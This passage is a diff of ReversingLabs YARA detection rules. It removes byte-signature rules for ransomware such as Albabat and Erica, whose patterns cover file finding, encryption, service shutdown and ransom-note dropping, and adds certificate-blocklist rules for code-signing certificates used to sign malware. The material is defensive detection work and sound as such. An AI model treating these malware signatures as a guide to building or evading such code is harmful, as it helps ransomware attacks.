-            ?? ?? 75 ?? 66 39 BD ?? ?? ?? ?? 74 ?? 51 FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 53 50
-            E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 8B 8D
-            ?? ?? ?? ?? 85 C0 6A ?? 58 75 ?? 8B C1 8B 8D ?? ?? ?? ?? 8B 10 8B 40 ?? 2B C2 C1 F8
-            ?? 3B C8 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 2B C1 6A ?? 50 8D 04 8A 50 E8 ?? ?? ?? ??
-            83 C4 ?? E9
-        }
-		$encrypt_files_p1 = {
-            8B FF 55 8B EC 83 EC ?? 53 56 57 FF 75 ?? 8D 45 ?? FF 75 ?? FF 75 ?? 50 E8 ?? ?? ??
-            ?? 83 C4 ?? 8D 7D ?? 8B F0 6A ?? 59 F3 A5 83 CE ?? 39 75 ?? 75 ?? E8 ?? ?? ?? ?? 83
-            20 ?? 8B 45 ?? 89 30 E8 ?? ?? ?? ?? 8B 00 E9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 5D ?? 89
-            03 3B C6 75 ?? E8 ?? ?? ?? ?? 83 20 ?? 89 33 E8 ?? ?? ?? ?? C7 00 ?? ?? ?? ?? EB ??
-            8B 45 ?? 8D 75 ?? 83 65 ?? ?? 33 C9 41 C7 45 ?? ?? ?? ?? ?? 83 EC ?? 89 08 8B 45 ??
-            C1 E8 ?? F7 D0 23 C1 6A ?? 59 89 45 ?? 8B FC 8D 45 ?? 50 FF 75 ?? F3 A5 E8 ?? ?? ??
-            ?? 8B F8 83 C4 ?? 89 7D ?? BA ?? ?? ?? ?? 83 FF ?? 75 ?? 8B 4D ?? 8B C1 23 C2 3B C2
-            75 ?? F6 45 ?? ?? 74 ?? 83 EC ?? 8D 45 ?? 81 E1 ?? ?? ?? ?? 8D 75 ?? 89 4D ?? 6A ??
-            59 8B FC 50 FF 75 ?? F3 A5 E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 89 7D ?? 83 FF ?? 75 ?? 8B
-            0B 8B C1 83 E1 ?? C1 F8 ?? 6B C9 ?? 8B 04 85 ?? ?? ?? ?? 80 64 08 ?? ?? FF 15 ?? ??
-            ?? ?? 50 E8 ?? ?? ?? ?? 59 E9 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ??
-            ?? ?? ?? 8B F0 56 E8 ?? ?? ?? ?? 59 8B 0B 8B C1 83 E1 ?? C1 F8 ?? 6B C9 ?? 57 8B 04
-            85 ?? ?? ?? ?? 80 64 08 ?? ?? FF 15 ?? ?? ?? ?? 85 F6 0F 85 ?? ?? ?? ?? E8 ?? ?? ??
-            ?? C7 00 ?? ?? ?? ?? E9 ?? ?? ?? ?? 83 F8 ?? 75 ?? 8A 45 ?? 0C ?? EB ?? 83 F8 ?? 8A
-        }
-		$encrypt_files_p2 = {
-            45 ?? 75 ?? 0C ?? 57 FF 33 88 45 ?? E8 ?? ?? ?? ?? 8A 55 ?? 59 59 8B 0B 80 CA ?? 8B
-            C1 88 55 ?? 83 E1 ?? C1 F8 ?? 6B C9 ?? 88 55 ?? 8B 04 85 ?? ?? ?? ?? 88 54 08 ?? 8B
-            0B 8B C1 83 E1 ?? C1 F8 ?? 6B C9 ?? F6 45 ?? ?? 8B 04 85 ?? ?? ?? ?? C6 44 08 ?? ??
-            74 ?? FF 33 E8 ?? ?? ?? ?? 8B F0 59 85 F6 75 ?? 8D 45 ?? C6 45 ?? ?? 50 FF 75 ?? 8D
-            75 ?? 83 EC ?? 6A ?? 59 8B FC FF 33 F3 A5 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 8B F0
-            FF 33 E8 ?? ?? ?? ?? 59 8B C6 E9 ?? ?? ?? ?? 8B 03 8B C8 83 E0 ?? C1 F9 ?? 6B D0 ??
-            8A 45 ?? 8B 0C 8D ?? ?? ?? ?? 88 44 11 ?? 8B 0B 8B C1 C1 F8 ?? 83 E1 ?? 6B D1 ?? 8B
-            0C 85 ?? ?? ?? ?? 8B 45 ?? C1 E8 ?? 32 44 11 ?? 24 ?? 30 44 11 ?? F6 45 ?? ?? 75 ??
-            F6 45 ?? ?? 74 ?? 8B 0B 8B C1 83 E1 ?? C1 F8 ?? 6B C9 ?? 8B 04 85 ?? ?? ?? ?? 80 4C
-            08 ?? ?? 8B 75 ?? B9 ?? ?? ?? ?? 8B C6 23 C1 3B C1 0F 85 ?? ?? ?? ?? F6 45 ?? ?? 74
-            ?? FF 75 ?? FF 15 ?? ?? ?? ?? 83 EC ?? 8D 45 ?? 81 E6 ?? ?? ?? ?? 89 75 ?? 8D 75 ??
-            6A ?? 59 8B FC 50 FF 75 ?? F3 A5 E8 ?? ?? ?? ?? 8B D0 83 C4 ?? 83 FA ?? 75 ?? FF 15
-            ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B 0B 8B C1 83 E1 ?? C1 F8 ?? 6B C9 ?? 8B 04 85 ?? ??
-            ?? ?? 80 64 08 ?? ?? FF 33 E8 ?? ?? ?? ?? 59 E9 ?? ?? ?? ?? 8B 0B 8B C1 C1 F8 ?? 83
-            E1 ?? 6B C9 ?? 8B 04 85 ?? ?? ?? ?? 89 54 08 ?? 33 C0 5F 5E 5B 8B E5 5D C3
-        }
-		$shutdown_services_p1 = {
-            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ??
-            33 C5 89 45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 89 65 ?? 8B F9 8B 75 ?? 8B 1D
-            ?? ?? ?? ?? FF D3 83 7E ?? ?? 89 45 ?? 72 ?? 8B 36 6A ?? 56 FF 37 FF 15 ?? ?? ?? ??
-            8B F0 89 75 ?? 85 F6 0F 84 ?? ?? ?? ?? 8D 45 ?? 50 6A ?? 8D 45 ?? 50 6A ?? 56 FF 15
-            ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 45 ?? 83 F8 ?? 75 ?? 56 FF 15 ?? ?? ?? ?? 8B
-            4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C2 ??
-            ?? 83 F8 ?? 75 ?? 66 90 FF 77 ?? FF 15 ?? ?? ?? ?? 8D 45 ?? 50 6A ?? 8D 45 ?? 50 6A
-            ?? 56 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? FF D3 2B 45 ?? 3B
-            47 ?? 0F 87 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 8B CF E8
-            ?? ?? ?? ?? 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 8B 75 ?? 50 6A ?? 56 FF 15 ?? ?? ?? ?? 85
-            C0 0F 84 ?? ?? ?? ?? 83 7D ?? ?? 0F 84
-        }
-		$shutdown_services_p2 = {
-            FF 77 ?? FF 15 ?? ?? ?? ?? 8D 45 ?? 50 6A ?? 8D 45 ?? 50 6A ?? 56 FF 15 ?? ?? ?? ??
-            85 C0 0F 84 ?? ?? ?? ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? FF D3 2B 45 ?? 3B 47 ?? 0F 87
-            ?? ?? ?? ?? 83 7D ?? ?? 75 ?? E9 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 6A ?? 6A ??
-            E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 45 ?? 50 E8
-            ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 68 ?? ?? ??
-            ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ??
-            ?? ?? 68 ?? ?? ?? ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 68
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) ) and ( all of ( $shutdown_services_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Mikael LLC" and ( pe.signatures [ i ] . serial == "00:8c:ec:e6:df:54:cf:6a:d6:35:96:54:6d:77:ba:35:81" or pe.signatures [ i ] . serial == "8c:ec:e6:df:54:cf:6a:d6:35:96:54:6d:77:ba:35:81" ) and 1613088000 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win64_Ransomware_Albabat : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_984E84Cfe362E278F558E2C70Aaafac2 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Albabat ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "11941c0d-45fb-5746-bbad-f43f336d4b1d"
-		date = "2024-03-18"
-		modified = "2024-03-18"
+		id = "180f1209-7031-50fb-b1fc-3d357f2b73a1"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win64.Ransomware.Albabat.yara#L1-L139"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L11744-L11762"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "38ec8388b9006f6ab9a397858b89f4bfd7def2ffcf525cfc736abae49bc6034a"
+		logic_hash = "e7a8f3dff77121df53d5f932f861e15208b0607ba77712f40927bc14b17a53cd"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Albabat"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$encrypt_files_p1 = {
-            48 8D 05 ?? ?? ?? ?? 48 89 83 ?? ?? ?? ?? 48 C7 83 ?? ?? ?? ?? ?? ?? ?? ?? C7 83 ??
-            ?? ?? ?? ?? ?? ?? ?? 66 C7 83 ?? ?? 00 00 ?? ?? C7 83 ?? ?? ?? ?? ?? ?? ?? ?? 0F 57
-            F6 0F 11 B3 ?? ?? ?? ?? 48 C7 83 ?? ?? ?? ?? ?? ?? ?? ?? C6 83 ?? ?? ?? ?? ?? 4C 8D
-            83 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 D7 48 85 C0 74 ?? 0F B6 05 ?? ?? ?? ?? 48 8B 0D
-            ?? ?? ?? ?? 48 85 C9 75 ?? FF 15 ?? ?? ?? ?? 48 85 C0 0F 84 ?? ?? ?? ?? 48 89 C1 48
-            89 05 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? 31 D2 FF 15 ?? ?? ?? ?? 48 85 C0 0F 84 ?? ?? ??
-            ?? 48 89 C6 48 89 38 4C 8D 35 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 89 BB ?? ?? ?? ?? 48 C7
-            83 ?? ?? ?? ?? ?? ?? ?? ?? 0F 11 B3 ?? ?? ?? ?? 48 89 F9 E8 ?? ?? ?? ?? 48 89 C6 48
-            89 D7 48 85 C0 74 ?? 48 85 FF 0F 85 ?? ?? ?? ?? 48 89 7C 24 ?? 48 8D 8B ?? ?? ?? ??
-            48 8D 93 ?? ?? ?? ?? 4C 8D 83 ?? ?? ?? ?? 49 89 F1 E8 ?? ?? ?? ?? 48 83 BB ?? ?? ??
-            ?? ?? 0F 84 ?? ?? ?? ?? 48 8B BB ?? ?? ?? ?? 0F B6 05 ?? ?? ?? ?? 48 8B 0D ?? ?? ??
-            ?? 48 85 C9 75 ?? FF 15 ?? ?? ?? ?? 48 85 C0 0F 84 ?? ?? ?? ?? 48 89 C1 48 89 05 ??
-            ?? ?? ?? 41 B8 ?? ?? ?? ?? 31 D2 FF 15 ?? ?? ?? ?? 48 85 C0 0F 84 ?? ?? ?? ?? 48 89
-        }
-		$encrypt_files_p2 = {
-            C6 48 89 38 4C 8D 35 ?? ?? ?? ?? 48 83 BB ?? ?? ?? ?? ?? 74 ?? 4C 8B 83 ?? ?? ?? ??
-            48 8B 0D ?? ?? ?? ?? 31 D2 FF 15 ?? ?? ?? ?? 48 8B 8B ?? ?? ?? ?? FF 15 ?? ?? ?? ??
-            48 85 F6 0F 84 ?? ?? ?? ?? 48 89 B3 ?? ?? ?? ?? 4C 89 B3 ?? ?? ?? ?? 4C 8D B3 ?? ??
-            ?? ?? 4C 89 B3 ?? ?? ?? ?? 4C 8D 3D ?? ?? ?? ?? 4C 89 BB ?? ?? ?? ?? 48 8D 05 ?? ??
-            ?? ?? 48 89 83 ?? ?? ?? ?? 48 C7 83 ?? ?? ?? ?? ?? ?? ?? ?? 48 C7 83 ?? ?? ?? ?? ??
-            ?? ?? ?? 48 8D BB ?? ?? ?? ?? 48 89 BB ?? ?? ?? ?? 48 C7 83 ?? ?? ?? ?? ?? ?? ?? ??
-            48 8D 8B ?? ?? ?? ?? 48 8D 93 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B B3 ?? ?? ?? ?? 48 8B
-            93 ?? ?? ?? ?? 4C 8B A3 ?? ?? ?? ?? 48 89 F1 E8 ?? ?? ?? ?? 4D 85 E4 74 ?? 48 8B 0D
-            ?? ?? ?? ?? 31 D2 49 89 F0 FF 15 ?? ?? ?? ?? 4C 89 B3 ?? ?? ?? ?? 4C 89 BB ?? ?? ??
-            ?? 48 8D 05 ?? ?? ?? ?? 48 89 83 ?? ?? ?? ?? 48 C7 83 ?? ?? ?? ?? ?? ?? ?? ?? 48 8D
-            35 ?? ?? ?? ?? 48 89 B3 ?? ?? ?? ?? 48 C7 83 ?? ?? ?? ?? ?? ?? ?? ?? 4C 8D B3 ?? ??
-            ?? ?? 4C 89 B3 ?? ?? ?? ?? 48 C7 83 ?? ?? ?? ?? ?? ?? ?? ?? 48 C7 83 ?? ?? ?? ?? ??
-            ?? ?? ?? 48 8D 8B ?? ?? ?? ?? E8 ?? ?? ?? ?? 84 C0 0F 85 ?? ?? ?? ?? 48 8B 05 ?? ??
-            ?? ?? 48 83 F8 ?? 0F 85 ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 65 48 8B
-            14 25 ?? ?? ?? ?? 48 8B 0C CA 48 8D 89 ?? ?? ?? ?? 48 39 C8 75 ?? 8B 05 ?? ?? ?? ??
-            FF C0 75 ?? 48 8D 0D ?? ?? ?? ?? 4C 8D 05 ?? ?? ?? ?? BA ?? ?? ?? ?? E8
-        }
-		$drop_ransom_note = {
-            48 8D 05 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 48
-            89 B4 24 ?? ?? ?? ?? 48 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 4C 89 B4 24 ?? ?? ?? ?? 48
-            C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? 48 8D 94 24 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 48 83 BC 24 ?? ?? ?? ?? ?? 74 ?? 4C 8B 84 24 ?? ?? ?? ?? 48 8B 0D ?? ??
-            ?? ?? 31 D2 FF 15 ?? ?? ?? ?? 48 8D B4 24 ?? ?? ?? ?? 48 8D 94 24 ?? ?? ?? ?? 48 89
-            F1 E8 ?? ?? ?? ?? 48 85 C0 4C 8B 74 24 ?? 74 ?? 48 89 C5 4C 8B 6C 24 ?? E9 ?? ?? ??
-            ?? 4D 8D 0C D1 49 83 C1 ?? 48 C1 E2 ?? 48 F7 DA 4F 8D 14 C2 49 83 C2 ?? 49 C1 E0 ??
-            49 F7 D8 45 31 DB 4C 39 DA 0F 84 ?? ?? ?? ?? 4D 39 D8 0F 84 ?? ?? ?? ?? 4B 8B 34 19
-            4F 8B 34 1A 4C 39 F6 0F 82 ?? ?? ?? ?? 49 83 C3 ?? 4C 39 F6 76 ?? E9 ?? ?? ?? ?? 48
-            8D 15 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 80 BC 24
-            ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48 8B AC 24 ?? ?? ?? ?? 4C
-            8B 84 24 ?? ?? ?? ?? 48 C7 44 24 ?? ?? ?? ?? ?? 4C 8D 0D ?? ?? ?? ?? 48 8D 8C 24 ??
-            ?? ?? ?? 48 89 DA E8 ?? ?? ?? ?? 4C 8B B4 24 ?? ?? ?? ?? 4C 8B 84 24 ?? ?? ?? ?? 48
-            C7 44 24 ?? ?? ?? ?? ?? 4C 8D 0D ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? 4C 89 F2 E8 ??
-            ?? ?? ?? 48 83 BC 24 ?? ?? ?? ?? ?? 74 ?? 48 8B 0D ?? ?? ?? ?? 31 D2 4D 89 F0 FF 15
-            ?? ?? ?? ?? 48 85 ED 74 ?? 48 8B 0D ?? ?? ?? ?? 31 D2 49 89 D8 FF 15 ?? ?? ?? ?? 48
-            8D 9C 24 ?? ?? ?? ?? 48 89 D9 E8 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 4C 8D 0D ?? ?? ??
-            ?? 41 B8 ?? ?? ?? ?? 48 89 D9 E8 ?? ?? ?? ?? 0F 10 00 0F 11 84 24 ?? ?? ?? ?? 48 8B
-            8C 24 ?? ?? ?? ?? 48 85 C9 74
-        }
-		$change_desktop_wallpaper = {
-            4C 8D 0D ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? 48 89 DA E8 ?? ?? ?? ?? 48 83 BC 24 ??
-            ?? ?? ?? ?? 74 ?? 48 8B 0D ?? ?? ?? ?? 31 D2 49 89 D8 FF 15 ?? ?? ?? ?? 4D 85 F6 74
-            ?? 48 8B 0D ?? ?? ?? ?? 31 D2 49 89 F0 FF 15 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D
-            8C 24 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C 8D 25 ?? ?? ?? ?? 48 85 C0 4C
-            8B 74 24 ?? 0F 85 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? 41 B8 ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 80 BC 24 ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 48 8B B4 24 ?? ??
-            ?? ?? 4C 8B AC 24 ?? ?? ?? ?? 4C 8B 84 24 ?? ?? ?? ?? 48 C7 44 24 ?? ?? ?? ?? ?? 4C
-            8D 0D ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? 48 89 F2 E8 ?? ?? ?? ?? 48 8B 9C 24 ?? ??
-            ?? ?? 4C 8B 84 24 ?? ?? ?? ?? 48 C7 44 24 ?? ?? ?? ?? ?? 4C 8D 0D ?? ?? ?? ?? 48 8D
-            8C 24 ?? ?? ?? ?? 48 89 DA E8 ?? ?? ?? ?? 48 83 BC 24 ?? ?? ?? ?? ?? 74 ?? 48 8B 0D
-            ?? ?? ?? ?? 31 D2 49 89 D8 FF 15 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 4C 8B B4 24 ??
-            ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? 48 89 DA 4D 89 F0 E8 ?? ?? ?? ?? 83 BC 24 ?? ?? ??
-            ?? ?? 0F 85 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? 89 C1 83 E1 ?? 83 F9 ?? 0F 85 ?? ??
-            ?? ?? 48 8D 58 ?? 4C 8B 70 ?? 48 8B 68 ?? 4C 89 F1 FF 55
-        }
-		$find_files_p1 = {
-            4C 8D 0D ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? 48 89 DA E8 ?? ?? ?? ?? 48 83 BC 24 ??
-            ?? ?? ?? ?? 74 ?? 48 8B 0D ?? ?? ?? ?? 31 D2 49 89 D8 FF 15 ?? ?? ?? ?? 4D 85 FF 74
-            ?? 48 8B 0D ?? ?? ?? ?? 31 D2 49 89 F0 FF 15 ?? ?? ?? ?? 48 C7 84 24 ?? ?? ?? ?? ??
-            ?? ?? ?? 66 0F EF C0 F3 0F 7F 84 24 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? 48 8D 94 24
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 85 C0 0F 84 ?? ?? ?? ?? 48 89 C5 4C 8B 6C 24 ?? 4C 8B
-            74 24 ?? E9 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? 31 D2 49 89 F0 E8 ?? ?? ?? ?? 48 8B
-            84 24 ?? ?? ?? ?? 48 8B AC 24 ?? ?? ?? ?? 48 29 E8 48 39 F0 72 ?? 48 8B 8C 24 ?? ??
-            ?? ?? 48 01 E9 31 D2 49 89 F0 E8 ?? ?? ?? ?? 48 01 F5 48 89 AC 24 ?? ?? ?? ?? E9 ??
-            ?? ?? ?? 48 C1 ED ?? 74 ?? 41 BD ?? ?? ?? ?? E9 ?? ?? ?? ?? 49 83 FF ?? 72 ?? 48 85
-            DB 74 ?? 48 8B 84 24 ?? ?? ?? ?? EB ?? 48 8D 8C 24 ?? ?? ?? ?? 48 89 EA 49 89 F0 E8
-            ?? ?? ?? ?? 48 8B AC 24 ?? ?? ?? ?? EB ?? 4C 89 FB 4C 89 F0 4D 85 FF 74 ?? 49 89 DC
-            48 8B 44 D8 ?? 48 85 C0 74 ?? 48 0F BD C0 48 83 F0 ?? EB ?? 45 31 E4 EB ?? B8 ?? ??
-            ?? ?? 49 C1 E4 ?? 49 83 CC ?? 49 29 C4 49 C1 EC ?? 48 8B B4 24 ?? ?? ?? ?? BA ?? ??
-            ?? ?? 48 89 F1 45 31 C0 E8 ?? ?? ?? ?? 48 89 F1 E8 ?? ?? ?? ?? 49 89 C7 49 83 FC
-        }
-		$find_files_p2 = {
-            73 ?? 48 8B 0D ?? ?? ?? ?? 31 D2 4D 89 F8 FF 15 ?? ?? ?? ?? 41 BD ?? ?? ?? ?? E9 ??
-            ?? ?? ?? BA ?? ?? ?? ?? 4C 89 E1 E8 ?? ?? ?? ?? 48 85 C0 0F 84 ?? ?? ?? ?? 48 8D 68
-            ?? 49 8D 5C 24 ?? 48 8B 8C 24 ?? ?? ?? ?? 48 89 EA 48 89 44 24 ?? E8 ?? ?? ?? ?? 48
-            8B 44 24 ?? F3 41 0F 6F 07 41 0F 10 4F ?? 0F 11 48 ?? F3 0F 7F 40 ?? 49 8D 4C 24 ??
-            48 39 D9 0F 83 ?? ?? ?? ?? 4D 89 E5 4C 8D 60 ?? 49 8D 4D ?? 43 C6 44 2C ?? ?? 48 39
-            CB 0F 82 ?? ?? ?? ?? 43 0F 11 74 2C ?? 43 0F 11 7C 2C ?? 48 C7 44 24 ?? ?? ?? ?? ??
-            4C 89 E1 48 89 DA 48 8B B4 24 ?? ?? ?? ?? 49 89 F0 49 89 E9 E8 ?? ?? ?? ?? 48 89 5C
-            24 ?? BA ?? ?? ?? ?? 48 89 E9 49 89 F0 4D 89 E1 E8 ?? ?? ?? ?? 48 8B 0D ?? ?? ?? ??
-            31 D2 4D 89 F8 FF 15 ?? ?? ?? ?? 0F B6 05 ?? ?? ?? ?? BA ?? ?? ?? ?? 4C 89 E9 E8 ??
-            ?? ?? ?? 48 85 C0 0F 84 ?? ?? ?? ?? 48 89 C3 48 8D B4 24 ?? ?? ?? ?? 48 89 C1 48 8B
-            54 24 ?? 4D 89 E8 E8
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) ) and ( $drop_ransom_note ) and ( $change_desktop_wallpaper )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Arctic Nights \\xC3\\x84k\\xC3\\xA4slompolo Oy" and ( pe.signatures [ i ] . serial == "00:98:4e:84:cf:e3:62:e2:78:f5:58:e2:c7:0a:aa:fa:c2" or pe.signatures [ i ] . serial == "98:4e:84:cf:e3:62:e2:78:f5:58:e2:c7:0a:aa:fa:c2" ) and 1640304000 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Erica : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_Ff52Eb011Bb748Fee75153Cbe1E50Dd6 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Erica ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "38f57157-bd49-5a63-8c69-497eb9efe274"
-		date = "2020-06-26"
-		modified = "2020-07-15"
+		id = "acd29c6d-27ed-587a-b17c-989e69082434"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Erica.yara#L1-L76"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L11764-L11782"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "93512091943f3a3b395c38fa3b0f5ecdbbf1cdf967ccfea4d7145c940076e046"
+		logic_hash = "8c80ed4e4f77df34ff9fcc712deda4c1bbedc588f2b01d02aa705e368fb98c5e"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Erica"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$encrypt_files_p1 = {
-            55 8B EC 83 C4 ?? 53 56 57 89 4D ?? 8B F2 8B D8 8B 45 ?? E8 ?? ?? ?? ?? 33 C0 55 68
-            ?? ?? ?? ?? 64 FF 30 64 89 20 33 C0 89 45 ?? 8A 43 ?? 2C ?? 72 ?? 74 ?? EB ?? BF ??
-            ?? ?? ?? EB ?? BF ?? ?? ?? ?? EB ?? BF ?? ?? ?? ?? 33 DB 68 ?? ?? ?? ?? 8B 45 ?? 50
-            8B 45 ?? 50 6A ?? 56 E8 ?? ?? ?? ?? 85 C0 74 ?? 8D 45 ?? 50 6A ?? 6A ?? 57 8B 06 50
-            E8 ?? ?? ?? ?? 85 C0 74 ?? 6A ?? 8B 45 ?? E8 ?? ?? ?? ?? 50 8D 45 ?? E8 ?? ?? ?? ??
-            50 8B 45 ?? 50 E8 ?? ?? ?? ?? 85 C0 74 ?? 8B 45 ?? 50 6A ?? 8B 45 ?? 50 8B 45 ?? 50
-            8B 06 50 E8 ?? ?? ?? ?? 85 C0 75 ?? BB ?? ?? ?? ?? EB ?? BB ?? ?? ?? ?? EB ?? BB ??
-            ?? ?? ?? EB ?? BB ?? ?? ?? ?? 83 7D ?? ?? 74 ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 33 C0 5A
-            59 59 64 89 10 68 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? C3
-        }
-		$encrypt_files_p2 = {
-            8D 40 ?? 55 8B EC 83 C4 ?? 53 33 DB 89 5D ?? 89 5D ?? 8B D9 89 55 ?? 89 45 ?? 33 C0
-            55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 33 C0 89 45 ?? 33 C0 89 45 ?? 33 C0 89 45 ?? 33
-            C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D 45 ?? 50 8B 45 ?? 8D 50 ?? 8B 45 ?? 33 C9
-            E8 ?? ?? ?? ?? 8B 55 ?? 8B 45 ?? 83 C0 ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 8B
-            40 ?? E8 ?? ?? ?? ?? 8B D0 4A 8B 45 ?? 83 C0 ?? E8 ?? ?? ?? ?? 8B 45 ?? 8B 40 ?? E8
-            ?? ?? ?? ?? 89 45 ?? 8D 45 ?? 50 8B 45 ?? 8B 48 ?? 8B 45 ?? 8D 50 ?? 8B 45 ?? E8 ??
-            ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 85 C0 75 ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? E9
-            ?? ?? ?? ?? 8B 45 ?? 50 53 8B 45 ?? 50 8B 45 ?? 50 8D 4D ?? 8D 55 ?? 8B 45 ?? E8 ??
